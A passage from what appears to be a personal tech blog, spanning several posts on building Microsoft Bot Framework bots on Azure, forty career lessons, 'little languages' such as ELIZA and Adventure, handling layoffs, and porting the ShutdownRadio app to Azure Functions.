The Bot Framework has tried to standardize on markdown formatting for text messages, but support is spotty. For example Teams and WebChat work well, but Skype and SMS just display messages as raw text. Get used to running into this a lot — normalization across channels is pretty hit or miss, so for anything complex you can expect to be writing channel-specific code. This goes for conversation semantics as well. For example from my experience so far, the onMembersAdded activity:

  • Is called in Teams right away when the bot enters a channel or a new member joins;
  • Is called in WebChat only after the bot receives an initial message from the user; and
  • Is never called for Twilio SMS conversations at all.

Managing State

Quirks aside, for a stateless bot, that’s really about all there is to it. But not all bots are stateless — some of the most useful functionality emerges from a conversation that develops over time (even ELIZA needed a little bit of memory!) To accomplish that you’ll use the significantly over-engineered “BotState” mechanism you see in use at WumpusBot.java line 57. There are three types of state:

All of these are the same except for the implementation of getStorageKey, which grovels around in the turnContext to construct an appropriate key to identify the desired scope.

The state object delegates actual storage to an implementation of a CRUD interface. The framework implements two versions, one in-memory and one using Cosmos DB. The memory one is another example of why quickstarts are awful — it’s easy, but is basically never appropriate for the real world. It’s just a shortcut to make the framework look simpler than it really is.

The Cosmos DB implementation is fine except that it authenticates using a key. I wanted to use the same Managed Identity I used elsewhere in this app already, so I implemented my own in Storage.java. I cheated a little by ignoring “ETag” support to manage versioning conflicts, but I just couldn’t make myself believe that this was going to be a problem. (Fun fact: Cosmos lets you create items with illegal id values, but then you can’t ever read or delete them without some serious hackage. That’s why safeKey exists.)

Last and very important if you’re implementing your own Storage — notice the call to enableDefaultTyping on the Jackson ObjectMapper. Without this setting, the ObjectMapper serializes to JSON without type information. This is often OK because you’re either providing the type directly or the OM can infer reasonably. But the framework’s state map is polymorphic (it holds Objects), so these mechanisms can’t do the job. Default typing stores type info in the JSON so you get back what you started with.

Once you have picked your scope and set up Storage, you can relatively easily fetch and store state objects (in my situation a WumpusState) with this pattern:

  1. Allocate a BotState object in your Bot singleton (line 39).
  2. Call getProperty in your activity handler to set up a named property (line 57).  
  3. Fetch the state using the returned StatePropertyAccessor and (ugh) wait on the Future (lines 58-60). Notice the constructor here which is used to initialize the object on first access.  
  4. Use the object normally.
  5. Push changes back to storage before exiting your handler (line 68). Change tracking is implicit, so be sure to update state in the specific object instance you got in step #3. This is why Wumpus.newGame() never reallocates a WumpusState once it’s attached.

Testing your Bot Locally

Once you have your Function App running and responding to incoming messages, you can test it out locally using the Bot Framework Emulator. The Emulator is a GUI that can run under Windows, Mac or Linux (in X). You provide your bot’s endpoint URL (e.g., http://localhost:7071/wumpus for the WumpusBot running locally with mvn azure-functions:run) and the app establishes a conversation that includes a bunch of nifty debugging information.

Connecting to the Bot Service

The emulator is nice because you can manage things completely locally. Testing with the real Bot Service gets a little more complicated, because it needs to access an Internet-accessible endpoint.

All of the docs and tutorials have you do this by running yet another random tool. ngrok is admittedly kind of cute — it basically just forwards a port from your local machine to a random url like https://92832de0.ngrok.io. The fact that it can serve up HTTPS is a nice bonus. So if you’re down for that, by all means go for it. But I was able to do most of my testing with the emulator, so by the time I wanted to see it live, I really just wanted to see it live. Deploying the function to Azure is easy and relatively quick, so I just did that and ended up with my real bot URL: https://shutdownradio.azurewebsites.net/wumpus.

The first step is to create the Bot in Azure. Search the portal for “Azure Bot” (it shows up in the Marketplace section). Give your bot a unique handle (I used “wumpus”) and pick your desired subscription and resource group (fair warning — most of all this can be covered under your free subscription plan, but you might want to poke around to be sure you know what you’re getting into). Java bots can only be “Multi Tenant” so choose that option and let the system create a new App ID.

Once creation is complete, paste your bot URL into the “Messaging Endpoint” box. Next copy  down the “Microsoft App Id” value and click “Manage” and then “Certificates & secrets.” Allocate a new client secret since you can’t see the value of the one they created for you (doh). Back in the “Configuration” section of your Function app, add these values (remember my comment about “configSuffix” at the beginning of all this):

  • MicrosoftAppId_wumpus (your app id)
  • MicrosoftAppSecret_wumpus (your app secret)
  • MicrosoftAppType_wumpus (“MultiTenant” with no space)

If you want to run RadioBot as well, repeat all of this for a new bot using the endpoint /bot and without the “_wumpus” suffixes in the configuration values.

Congratulations, you now have a bot! In the Azure portal, you can choose “Test in Web Chat” to give it a spin. It’s pretty easy to embed this chat experience into your web site as well (instructions here).

You can use the “Channels” tab to wire up your bot to additional services. I hooked Wumpus up to Twilio SMS using the instructions here. In brief:

  • Sign up for Twilio and get an SMS number.
  • Create a “TwiML” application on their portal and link it to the Bot Framework using the endpoint https://sms.botframework.com/api/sms.
  • Choose the Twilio channel in the Azure portal and paste in your TwiML application credentials.

That’s it! Just text “play” to 706-943-3865 and you’re off to the races.

Bots in Microsoft Teams

Connecting to Teams is conceptually similar to SMS, just a lot more fiddly.

First, enable the Microsoft Teams channel in your Bot Service configuration. This is pretty much just a checkbox and confirmation that this is a Commercial, not Government, bot.

Next, bop over to the Teams admin site at https://admin.teams.microsoft.com/ (if you’re not an admin you may need a hand here). Under “Teams Apps” / “Setup Policies” / “Global”, make sure that the “Upload custom apps” slider is enabled. Note if you want to be more surgical about this, you can instead add a new policy with this option just for developers and assign it to them under “Manage Users.”

Finally, head over to https://dev.teams.microsoft.com/apps and create a new custom app. There are a lot of options here, but only a few are required:

  • Under “Basic Information”, add values for the website, privacy policy and terms of use. Any URL is fine for now, but they can’t be empty, or you’ll get mysterious errors later.
  • Under “App Features”, add a “Bot.” Paste your bot’s “Microsoft App Id” (the same one you used during the function app configuration) into the “Enter a Bot ID” box. Also check whichever of the “scope” checkboxes are interesting to you (I just checked them all).

Save all this and you’re ready to give it a try. If you want a super-quick dopamine hit, just click the “Preview in Teams” button. If you want to be more official about it, choose “Publish” / “Publish to org” and then ask your Teams Admin to approve the application for use. If you’re feeling really brave, you can go all-in and publish your bot to the Teams Store for anyone to use, but that’s beyond my pay grade here. Whichever way you choose to publish, once the app is in place you can start a new chat with your bot by name, or add them to a channel by typing @ and selecting “Get Bots” in the resulting popup. Pretty cool!

A caveat about using bots in channels: your bot will only receive messages in which they are @mentioned, which can be slightly annoying but net net probably makes sense. Unfortunately though, it is probably going to mess up your message parsing, because the mention is included in the message text (e.g., “<at>botname</at> real message.”). I’ve coded RadioBot to handle this by stripping out anything between “at” markers at line 454. Just another way in which you really do need to know what channel you’re dealing with.

Teams in particular has a whole bunch of other capabilities and restrictions beyond what you’ll find in the vanilla Bot Framework. It’s worth reading through their documentation and in particular being aware of the Teams-specific stuff you’ll find in TeamsChannelData.

We made it!

Well that was a lot; kind of an anti-quickstart. But if you’ve gotten this far, you have a solid understanding of how the Bot Framework works and how the pieces fit together, start to finish. There is a bunch more we could dig into (for instance check out the Adaptive Card interfaces in RadioBot here and here) — but we don’t need to, because you’ll be able to figure it out for yourself. Teach a person to fish or whatever, I guess.

Anyhoo, if you do anything cool with this stuff, I’d sure love to hear about it, and happy to answer questions if you get stuck as well. Beyond that, I hope you’ll enjoy some good conversations with our future robot overlords, and I’ll look forward to checking in with another post soon!

Forty for Forty

I really was born at exactly the right time to ride the golden age of computing. When I was in high school and college, computers were powerful enough to impact every corner of our world, but simple enough that actual humans could still develop a connection to the metal. I surfed those years straight into the cradle of 1990s computing — classic Macintoshes, Windows 3.0 and 95, the early Internet, Linux; so much great stuff and the perfect setup for twenty years trying to solve big problems in healthcare.

And so many incredible people, most of them way smarter than me. I do a fair bit of mentoring these days, and honestly 99% of is just sharing stuff others have taught me. I’m completely serious; my problem-solving toolbox basically boils down to imagining what somebody smart I’ve known would do. And it works great!

So I thought I’d share a few particularly valuable gems here — forty lessons for the (a few more than) forty years I’ve been in the game. I present each with minimal context — not quite bumper stickers but sometimes close. Attributions are real initials; feel free to make your guesses!

  1. It’s never the operating system. (DO)
  2. You can understand any system if you start with main. (BA)
  3. Design the object model first. (UM)
  4. Good code is fun to read. (JB)
  5. Don’t spawn that thread. (CC)
  6. When you’re stuck, just look again — eventually you’ll see it. (DS)
  7. If you’re fixing the most bugs, you probably wrote the most bugs. (BS)
  8. The worst case probably isn’t that bad. (BB)
  9. Comments lie. (DS)
  10. People don’t think asynchronously. (SN)
  11. Take your annual review seriously for one hour and then stop. (PK)
  12. Aircraft carriers turn slowly, but sometimes you need one. (PN)
  13. Meetings are a waste of time. (EJ)
  14. Perception is reality. (TL)
  15. You might actually be the smartest person in the room. (KC)
  16. Code Talks. (PK)
  17. Implement a memory manager once before you die. (JL)
  18. Walkthroughs are better testing than testing. (UM)
  19. Obvious to you isn’t obvious to everyone (so speak up). (PN)
  20. Don’t be clever. (JB)
  21. Never override a no-hire. (AC)
  22. If you don’t understand the details then you don’t understand. (BG)
  23. Have a single source of truth. (SN)
  24. There’s always one more bug. (RH)
  25. If you want to be a manager, you probably shouldn’t be one. (PK)
  26. Most problems can be solved with Excel. (GE)
  27. No secret lists. (LW)
  28. Honest != a$$hole. (KC)
  29. Adding more developers won’t help. (FB)
  30. Don’t lower your bet. (DN)
  31. How hard can it be? (JL)
  32. Outsourcing costs more than it saves. (SN)
  33. SQL is smarter than you think. (BD)
  34. Write it twice. (UM)
  35. Data wins debates. (TC)
  36. After a win, always take something off the table. (RN)
  37. Make it hard to do the wrong thing. (IA)
  38. Leaky abstraction is worse than no abstraction. (UM)
  39. It has to work first. (DK)
  40. Take the win, Sean. (AM)

You are in a maze of twisty little languages, all alike.

It seems like everywhere I go these days I’m talking to a bot. Now don’t get me wrong, I’m all for technology that keeps me from having to interact with actual humans. And truth be told, they’re getting pretty good — talking to Alexa has just become something I do without thinking about it. But it super-annoys me when I visit some random website and their chatbot pops up in my face pretending to be a real person (I’m looking at you, oreilly.com).

I think it’s good for us to know when we’re talking to a computer and when we’re not. And that’s not only some squishy ethical thing — it just works better. I have different expectations talking to a bot than I do to a human, and I’m more than happy to adjust my speaking pattern to increase the chances of success. For example, I know that “shuffle” and “album” are Alexa keywords for music, so I ask her to “shuffle album Cake and Pie” (which works) rather than “please play Cake and Pie in random order” (sad Alexa noise).

And you know what? This is fine! Speech recognition aside (amazing stuff there), we use specialized and restricted dialects for specialized purposes all the time, even between humans. Curlers yell “clean” or “hurry” and the sweepers immediately know what they mean. I tell the guy at the lumber yard that I put “16 feet of 2×12 treated” into my car and he knows what to charge me. This kind of jargon removes ambiguity from communication, and that’s a big plus when you’re trying to get something done together.

So what’s my point? There’s an interesting dichotomy here, because the hype around chatbots is all about artificial intelligence, but the reality is that it’s much more about the creation of purpose-built “little languages.” Those are way more interesting to me, so that’s what I’m going to dig into today.

Little Languages

Jon Bently wrote an incredible pair of books in Programming Pearls and More Programming Pearls. Both are essential reading for anyone who cares about software, even though some (not all!) of the specific technology is showing its age. They’re entertaining too, thanks to the way he weaves together anecdotes and concrete code. What I’m saying here is, buy the books.

Anyways, I first encountered “little languages” in More Programming Pearls, but you can read the original article about them online here. Bentley was part of the UNIX crowd at Bell Labs and loved (as all good programmers do) the idea of pipelines — how programs can work together to do increasingly complex things (really just top-down-design in different clothes, but since pretty much all problems converge back to TDD that’s cool by me). In the article, he demonstrates the concept using picture generators that used to be (maybe still are?) commonly used for technical papers. For example, the chem language allows folks to concisely describe and depict chemical structures. Here’s LSD:

.cstart
B:  benzene pointing right
F:  flatring5 pointing left put N at 5 double 3,4 with .V1 at B.V2
    H below F.N
R:  ring pointing right with .V4 at B.V6
    front bond right from R.V6 ; H
R:  ring pointing right with .V2 at R.V6 put N at 1 double 3,4
    bond right from R.N ; CH3
    back bond -60 from R.V5 ; H
    bond up from R.V5 ; CO
    bond right ; N(C2H5)2
.cend

You can run this yourself on most Linux systems; if it’s not there already, use your package manager to install groff (groff is the GNU version of the typesetting app troff). Save the code above as lsd.chem and use the command:

cat lsd.chem | chem | pic | groff -Tpdf > lsd.pdf

This has always stuck with me because it’s such a beautiful specialized-to-generic pipeline:

  • chem lets you easily specify chemical structures, generating input for
  • pic, which creates any kind of picture, generating input for
  • groff, which formats any kind of document for presentation.

Adventure

Bentley’s little languages are primarily static, used as input to an interpreter. But the concept applies equally well to conversations, and we’ve been having conversations with computers for a long time. Exhibit A is Colossal Cave Adventure, the granddaddy of “interactive fiction.” If you had access to a computer in the seventies or eighties there’s a 100% chance you played it or one of its descendants like Zork or the early Roberta Williams titles. Interactive fiction today generally uses point-and-click, but you can very much still feel the connection to their early, text-based ancestors.

In Adventure, the computer acts as a dungeon master, describing your location and acting on your instructions (“go north”, “take lamp”, “fight dragon,” and so on). Your goal is to explore a network of underground caves (based on the real Mammoth Cave), accumulating gold and treasure along the way. You can give it a try yourself in the browser — I recommend keeping track of where you are by building up a map on paper along the way.

There are a million versions of the game. The one I first played was written by Don Woods as a modification of the original by Will Crowther. The FORTRAN code for the original Crowther version is on github (of course it is). The “little language” implemented there is shockingly expressive given its tiny vocabulary of 192 words.

  • In the GETIN subroutine, an input line is broken into one or two words: a VERB and an optional OBJECT. Each is truncated to five characters for processing, but extra characters are retained for display purposes.
  • Starting at label 2020, the words are matched to entries in the 192-word vocabulary table which are implicitly associated with classes (motion/action/special for verbs, normal/treasure for objects) based on their assigned number.
  • The verb is then dispatched to the correct handler. Most action verbs are handled using special-case logic, but motion verbs run through a state machine defined in the motion table. If you think about the cave as a graph, each row in the motion table is an edge that describes the verbs and game state required to move the player from the location in the first column to the location in the second.

Of course there’s a lot more to it than that. If you want to really dig into the code, there is a well-commented copy of the Woods version at the Interactive Fiction Archive, downloadable as a zipped tarball. You’ll still have to brush up on your FORTRAN to really get it, but who doesn’t love a good DO/CONTINUE loop packed with GOTO statements?

If you’ve played the game, it’s impossible not to be impressed with how immersive it is. With nothing more than VERB/OBJECT pairs, you can explore a world, solve puzzles, and even kill a dragon (with what? your bare hands?). I hope you get so sucked into the cave that you don’t come back to this post for a month.

Late breaking news: turns out this post is pretty timely, because Ken and Roberta Williams just announced that they are rebooting Colossal Cave for a new generation of folks … WOOT!

ELIZA the DOCTOR

Rogerian psychology is serious stuff. In (very) short, the goal is help patients understand themselves through a self-driven, internal dialogue. The therapist is there to provide safety and empathy, and to reflect back the observations and themes they are hearing. It has helped millions of people. But it’s also the easy butt of jokes, because on the surface it seems that the therapist isn’t really doing anything:

  • How many Rogerian therapists does it take to change a lightbulb?
  • I hear you wanting to know how many Rogerian therapists it takes to change a lightbulb.

Way back in 1965, Joseph Weizenbaum created ELIZA and DOCTOR, an engine and script respectively that do a remarkably good job of emulating a conversation with that satirized therapist. If you’ve never heard of ELIZA, you definitely should click on over to this site and say hello to her; she’s actually pretty impressive, especially when you consider that there is absolutely zero contextual “understanding” under the covers.

ELIZA’s little language is quite different from Adventure’s. Her goal is to transform input into responses that will seem relevant and appropriate to a human observer, especially one primed to expect a Rogerian conversation. The original source is available, but it’s written in MAD-SLIP and that one is even too arcane for me. Instead I’ll refer to Weizenbaum’s original paper in the ACM which is pretty great and totally worth reading.

The language is primarily defined by rules for recognizing input patterns and transforming them into responses. For example, suppose we receive the input “why do you hate me” and want to respond with “Why do you think I hate you.”

  1. The decomposition rule (0 you 0 me) is matched against the input. It’s basically a proto-regex. The number 0 means “match any 0 or more words,” while the alphabetic strings must match exactly. If the pattern matches, each section of the rule is “assigned” text from the input. In this case it would match as ((why do) (you) (hate) (me)).
  2. An associated recomposition rule (why do you think I 3 you) is used as a template to generate the response. Numbers are replaced with the Nth input grouping generated during decomposition (3 = “hate” in this example) to create the desired response: why do you think I hate you?

Note that even this simple pair of rules provides significant flexibility in our ability to respond to arbitrary input:

  • Why do you hate me / Why do you think I hate you
  • It seems that you no longer care about me / Why do you think I no longer care about you
  • You love me / Why do you think I love you
  • Apparently you are bananas for me / Why do you think I are bananas for you

Whoops! That last one uncovered a flaw in our engine — the second person singular “are” should have been transformed into the first person singular “am.” ELIZA uses additional rules called transforms to fix this up. There are also a bunch of other interesting details that make her respond in a mostly-believable way; a few examples:

  • Decomposition rules can have multiple possible recomposition rules; ELIZA selects from the list randomly but with minimal repetition.
  • Decomposition rules are associated with keywords that have a ranked order. In this way, more specific or interesting responses can be preferred over simpler ones. (This keyword-to-rule association was created primarily as a performance benefit to account for the limited processing power of the day, but the ranking is a nice side benefit.)
  • Fallback rules keep the conversation moving when no decomposition rules match successfully.
  • A “memory” feature keeps a short stack of important phrases used in the conversation that can be inserted to enhance a sense of continuity.

The actual syntax used to express the language is pretty hairy — basically a nest of parenthesized lists, just as you’d expect from a LISP variant. Here’s a short snip from DOCTOR that I’ve indented to be a tiny bit more readable; the full script is included at the end of the paper:

(CANT = CAN'T)
(WONT = WON'T)
(REMEMBER 5 
	((0 YOU REMEMBER 0) 
		(DO YOU OFTEN THINK OF 4)
		(DOES THINKING OF 4 BRING ANYTHING ELSE TO MIND)
		(WHAT ELSE OO YOU REMEMBER)
		(WHY DO YOU REMEMBER 4 JUST NOW)
		(WHAT IN THE PRESENT SITUATION REMINDS YOU OF 4)
		(WHAT IS THE CONNECTION BETWEEN ME AND 4))

It turns out that Charles Hayden reimplemented Eliza in Java and dramatically improved the little language. But aesthetics aside, just like Adventure, the ELIZA script language packs a great deal of smarts using a quite restricted syntax. Truth be told, I’d definitely choose to talk to her than to most of the marketing bots that get up in my face on the web every day.

Today’s Conversation Models

Modern little languages certainly look fancier than these early examples. If you’ve been reading this blog for awhile, you may recall my experience writing an Alexa “skill” to manage stuff in my house. I won’t repeat all the details here, but in short an Alexa “Interaction Model” include the following elements:

  • Intents: things that the user wants to do (e.g. turn on a particular configuration of lights).
  • Utterances: one or more template phrases that capture an intent (e.g., “turn family room lights on”).
  • Slots: placeholders in an utterance that capture meaningful parameters in the user’s request (e.g., “turn ROOM_SLOT ACTION_SLOT”).

Azure provides basically the same functionality in its Conversational Language Understanding suite (this is a new version of what used to be LUIS; it’s hard to keep up).

Feeling a little Deja Vu? Intents are basically ELIZA keywords. Utterances are decomposition rules. Slots are the numeric placeholders used in recomposition. It’s actually kind of startling just how similar they are. Of course there’s a ton of advanced processing now that notably improves the matching process — it would be wrong to minimize the advances there. But let’s give the old guys some credit, hey?

Hunt the Wumpus (by Text!)

When I started writing this article, the plan was to dig go pretty deep into the details of implementing a “bot” using the Microsoft Bot Framework. But as I look up from the keyboard, I’m two thousand words in already and haven’t even started that … so maybe better to save it for next time. But I’d hate to leave you without at least a little something concrete, so let’s at least introduce the WumpusBot and give it a spin.

Hunt the Wumpus is actually the very first computer game I ever played, over a printing teletype connected from my elementary school to a central PDP-11 somewhere. The goal is to explore a series of connected rooms, trying to shoot the “Wumpus” before he eats you or you fall into a bottomless pit. Along the way, bats may pick you up and move you randomly to another room. In the original game, you had magic “crooked arrows” that could travel between many rooms, but I chose to implement the simpler version described here where you can just shoot into any adjacent room.

Anyways, take out your trusty smartphone and text “play” to 706-943-3865 to give it a try for real. WumpusBot will reply with some instructions to get you started — its language is little indeed, pretty much just “move” and “shoot.”

The game logic is in Wumpus.java, and the bot innards are all in this directory. The cool thing about the Bot Framework is that it can multiplex your logic across a ton of “channels” — web chat, SMS, Teams, Slack, Facebook, and a bunch more. WumpusBot consists of:

Anyways, for now just enjoy the game — we’ll get into the details and the usual Microsoft devex bashing next time. Pro tip: whenever you feel a draft or smell something rotten, just backtrack and approach from a different room … unless a bat does you wrong, you’ll get him every time.

Layoffs Suck… for Everyone

My first experience with layoffs came during the dot-com bust in early 2001. I’d helped to build a company called drugstore.com during the boom period — we had a remarkable team full of insanely great people. The mission in those early days was simple: (1) get big fast to establish merchandizing power; (2) use technology to create a barrier to entry for traditional players. Money was easy, and we went all-in on both fronts. My contributions were mostly technical — and we did a ton. The first persistent shopping cart, wishlists and auto-replenishment, promotions and affiliates, live order and inventory status, pill robots — stuff that seems routine now. But back then there was just our team, the VC++ compiler and rack upon rack of 1U servers down in Renton. Some great times.

Hindsight is easy, but I still maintain with a straight face that if the money had lasted just a couple of more years we would have made it over the hump. Of course I think we were “special,” but who knows. Anyways, that clearly did not happen and pretty much overnight we were looking at a misaligned company with limited cash, limited revenue and enormous operating costs. That meant layoffs — and it was the f*cking worst. For everyone.

This week those memories came back to the surface, as another company I’m close to had to let a lot of good folks go. It bummed me out, and I fear that more companies will land in the same boat as we wrestle with the unsustainable state of today’s economy. Times like this are when leaders either shine or falter — I’ve done a little of both — but quite reasonably people are often hesitant to talk about their experiences. So let’s try to fill that gap — without further delay, some hard-won thoughts for leaders trying to make layoffs suck just a little bit less.

First and foremost: if you are a human, this is going to be really awful for you — hard decisions, hard conversations, personal grief and guilt, buckle up. I’m here for empathy and understanding. Beyond that: SUCK IT UP. No matter how bad it is for you, it’s a thousand times worse for the people going home to tell their families that they’ve lost their jobs. Your role is to be as transparent, honest, supportive and understanding as you can be, and to help everyone move on with the respect and dignity they deserve. Of course you’ll be sad — but remember, this is not about you, it’s about the people whose lives you are impacting.

1. Avoid the problem

You never have to lay off a person you didn’t hire in the first place.

Drugstore notwithstanding, I am not a fan of getting big fast, especially when it comes to FTEs. There is always pressure to do more, and it’s incredibly tempting to respond to that by asking for more headcount, which can come free and easy when the coffers are full of Series X funding. Beyond the fact that this rarely works in software anyways, it is likely to leave you people-heavy when money gets tight. And people are expensive — way more than you think. In my experience the “fully loaded” cost of an employee (including benefits, insurance, equipment and facilities, etc.) is around 2.5 times their salary and bonus alone. For better or worse, there is almost nothing you can do to reduce a budget faster than trim people.

So don’t add them until you know they have a long-term, structural purpose at the company. I also hate hiring contractors, but if you have a short-term burst of extra work, that can be a far better option. (If you can, contract on a project basis rather than as staff augmentation — it makes performance far easier to evaluate and gives you obvious go/no-go milestones.)

Your CEO is going to hate this advice. Hiring people feels good, and makes execs feel like their business is growing (pro tip: measure revenue instead). You may also have mentors that tell you to grab budget “when you can” — this may be good ladder-climbing advice, but it is irresponsible business management.

2. Try other stuff first

When you’re sitting face-to-face with somebody you’re letting go, you’re almost certainly going to tell them that it was a last resort — so make sure that’s true.

People costs do tend to dominate budgets, but there are other levers. Reduce travel and face-to-face meetings. Get rid of the fancy coffee makers. Delay a project for a quarter. Reduce benefits in a way that spreads a little pain across the whole company, maybe a year without bonuses or higher insurance copays. Be careful with these, because giving up a bonus is a lot easier for somebody making $250K than somebody making $25K.

But look at everything, because you probably also told folks that you were “like a family,” and a family works really hard to make ends meet before they sell a kid to the circus. So put in the work. Even if it isn’t enough in the end, people will see and appreciate that you honestly tried.

3. Day Of

First, understand that there is no “good” way to run a large-scale layoff — it doesn’t exist. There are already rumors floating around, even if you think there aren’t. While it’s ideal for everyone to be notified at the same time, it’s even more important that individuals learn their situation 1:1 and not through a mass email (or tweet). Reactions will vary: some folks will take the news well; most will be upset and a little embarrassed; a few may become angry and even belligerent. The best you can hope for is to get through the day maximizing for timely, straightforward personal notifications and efficient, minimally-awkward exits. Here’s what I’ve seen work best:

  1. BEFORE the day arrives, be sure you’re prepared:
    1. Have your severance package locked and described clearly in a printed document you can hand to affected employees. If you can continue healthcare coverage for a few months, that seems to have the biggest positive impact.
    1. Assemble a comprehensive Q&A document. As a leadership group, try to imagine every question you will be asked and have a ready answer. Read this Q&A a bunch! You do not want to be improvising in the moment.
    1. Make sure your IT department is looped in and is ready to manage accounts and access.
  2. ONE DAY BEFORE, schedule meetings.
    1. First, set up individual meetings with each affected employee, in a private conference room. Each employee should hear the news from their manager (or a level up if there is a relationship there). If your company has the resources, there should be an HR person in the room. Start these early and pack them together as closely as possible. 20 minutes is a good amount of time.
    1. Take particular care if there are affected folks on vacation or leave. It may be impossible to contact them in a timely way; just do your best.
    1. Schedule an “all-hands” meeting in the early afternoon or as soon as you’re able to finish individual meetings. This invite should be sent to the whole company, not just the remaining team.
  3. THE MORNING OF, try to manage individual meetings as best you can:
    1. Begin with the manager explaining that the company is having a layoff and their job is going away. It’s worth stressing this: it’s the job, not the person. Words do make a difference.
    1. Thank the person for the work and energy they have contributed to your shared mission. Reinforce that this is about streamlining costs and is unrelated to their job performance.
    1. Reiterate that the change is effective immediately. Describe the severance topline — just enough so that they know they have some economic support. Give them their physical package, and tell them to read through it carefully at home. You probably want them to sign an acknowledgement of receipt (not agreement). It is often better for HR to give this part of the message if that’s an option.
    1. Answer questions but really really try to stick to the Q&A. Don’t let it go too long or become a circular conversation.
    1. During the meeting, IT should freeze the employee’s email, access keys, VPN access and any other corporate accounts. This is terrible, but important — a single employee with a kneejerk reaction can do great damage not just to the company but to themselves as well. Much better to just remove the risk.
    1. Tell the employee to go home (unless they’re remote anyways), absorb their severance package, and to contact HR if they have any questions. This is also tricky — have somebody walk with them to pick up car keys and other items from their desk before leaving. They should not stay in the office, even just to “let people know.” If they grab a plant or two that they can carry, that’s fine. But do not have them “clean out” their office at this time … make a plan to box up things for pickup later, or schedule after-hours times for people to come back. This is not about risk the same way that IT access is — it is simply better to create some separation immediately so everyone can process in their own way.
  4. THE AFTERNOON OF, talk to remaining employees at the all-hands meeting.
    1. It’s OK to be sad … how could you not be? Share that with the team; let everyone be sad together. But don’t wallow and don’t make it about yourself.
    1. Take responsibility for the decision. Explain how you got here, and why you believe this is the best course of action. External factors are real, but if the company was over-leveraged because of mistakes, own that too. Explain not what you would do in hindsight, but how you’re going to do better going forward.
    1. Tell them the three-month plan. Remember, right now everyone now thinks that this was just the first layoff with more to come — why should they stay engaged?
    1. Take Q&A, but keep it limited and do not improvise. Use the same materials you prepped for individual meetings.
    1. Keep it short. Tell everyone to go home for the day and decompress — tomorrow we dig in and start again.
  5. THE EVENING OF, try to close this chapter so you can move on.
    1. Send a company-wide email re-stating what you said in the all-hands meeting. Remind folks it’s great to reach out to their ex-colleagues, professionally to help with their job search and personally because they are real humans that we still love.
    1. Breathe. Give your family a hug. Call your mom. Have a beer or a tea or a whiskey and go to bed. You’ve done your best.

4. The Next Day and Moving Forward

Your most important job today, and for the next few days, is to show up.

Yesterday people needed a little time to themselves; today they need to see that your company is alive and vibrant and making magic. That doesn’t mean ignoring what happened or pretending your ex-colleagues don’t exist. On the contrary, it’ll be the number one topic of conversation, and you should be prepared for a steady stream of folks looking to you for understanding and a reason to believe. But most importantly, you and other company leaders just need to be there. This is a very easy time to disappear and avoid the tough conversations — don’t let that happen.

Shoulders back, head up, let’s go.

Tactically, there is now (by definition) more work to do than people to do it. Make sure you account for this as you reallocate projects and responsibilities. If you can cancel or postpone things (you can), do that so people know that you understand that this is tough for them too. If there is work that you personally can pick up, do it. This is one of those crisis times when teams either bond together or fall apart, so do whatever you can to nudge things the right way.

I guess that’s about it. Surprisingly emotional to even write about — but hopefully a useful roadmap, and a reminder that this stuff isn’t a game. It’s lives, careers, dignity and responsibility — what you do and how you handle it matters. Step up!

Shutdown Radio on Azure

Back about a year ago when I was playing with ShutdownRadio, I ranted a bit about my failed attempt to implement it using Azure Functions and Cosmos. Just to recap, dependency conflicts in the official Microsoft Java libraries made it impossible to use these two core Azure technologies together — so I punted. I planned to revisit an Azure version once Microsoft got their sh*t together, but life moved on and that never happened.

Separately, a couple of weeks ago I decided I should learn more about chatbots in general and the Microsoft Bot Framework in particular. “Conversational” interfaces are popping up more and more, and while they’re often just annoyingly obtuse, I can imagine a ton of really useful applications. And if we’re ever going to eliminate unsatisfying jobs from the world, bots that can figure out what our crazily imprecise language patterns mean are going to have to play a role.

No joke, this is what my Bellevue workbench looks like right now, today.

But heads up, this post isn’t about bots at all. You know that thing where you want to do a project, but you can’t do the project until the workbench is clean, but you can’t clean up the workbench until you finish the painting job sitting on the bench, but you can’t finish that job until you go to the store for more paint, but you can’t go to the store until you get gas for the car? Yeah, that’s me.

My plan was to write a bot for Microsoft Teams that could interact with ShutdownRadio and make it more natural/engaging for folks that use Teams all day for work anyways. But it seemed really silly to do all of that work in Azure and then call out to a dumb little web app running on my ancient Rackspace VM. So that’s how I got back to implementing ShutdownRadio using Azure Functions. And while it was generally not so bad this time around, there were enough gotchas that I thought I’m immortalize them for Google here before diving into the shiny new fun bot stuff. All of which is to say — this post is probably only interesting to you if you are in fact using Google right now to figure out why your Azure code isn’t working. You have been warned.

A quick recap of the app

The idea of ShutdownRadio is for people to be able to curate and listen to (or watch I suppose) YouTube playlists “in sync” from different physical locations. There is no login and anyone can add videos to any channel — but there is also no list of channels, so somebody has to know the channel name to be a jack*ss. It’s a simple, bare-bones UX — the only magic is in the synchronization that ensures everybody is (for all practical purposes) listening to the same song at the same time. I talked more about all of this in the original article, so won’t belabor it here.

For your listening pleasure, I did migrate over the “songs by bands connected in some way to Seattle” playlist that my colleagues at Adaptive put together in 2020. Use the channel name “seattle” to take it for a spin; there’s some great stuff in there!

Moving to Azure Functions

The concept of Azure Functions (or AWS Lambda) is pretty sweet — rather than deploying code to servers or VMs directly, you just upload “functions” (code packages) to the cloud, configure the endpoints or “triggers” that allow users to execute them (usually HTTP URLs), and let your provider figure out where and how to run everything. This is just one flavor of the “serverless computing” future that is slowly but surely becoming the standard for everything (and of course there are servers, they’re just not your problem). ShutdownRadio exposes four of these functions:

  • /home simply returns the static HTML page that embeds the video player and drives the UX. Easy peasy.
  • /channel returns information about the current state of a channel, including the currently-playing video.
  • /playlist returns all of the videos in the channel.
  • /addVideo adds a new video to the channel.

Each of these routes was originally defined in Handlers.java as HttpHandlers, the construct used by the JDK internal HttpServer. After creating the Functions project using the “quickstart” maven archetype, lifting these over to Azure Functions in Functions.java was pretty straightforward. The class names are different, but the story is pretty much the same.

Routes and Proxies

My goal was to make minimal changes to the original code — obviously these handlers needed to change, as well as the backend store (which we’ll discuss later), but beyond that I wanted to leave things alone as much as possible. By default Azure Functions prepend “/api/” to HTTP routes, but I was able to match the originals by turfing that in the host.json configuration file:

"extensions": {
       "http": {
             "routePrefix": ""
       }
}

A trickier routing issue was getting the “root” page to work (i.e., “/” instead of “/home“). Functions are required to have a non-empty name, so you can’t just use “” (or “/” yes I tried). It took a bunch of digging but eventually Google delivered the goods in two parts:

  1. Function apps support “proxy” rules via proxies.json that can be abused to route requests from the root to a named function (note the non-obvious use of “localhost” in the backendUri value to proxy routes to the same application).
  2. The maven-resources-plugin can be used in pom.xml to put proxies.json in the right place at packaging time so that it makes it up to the cloud.

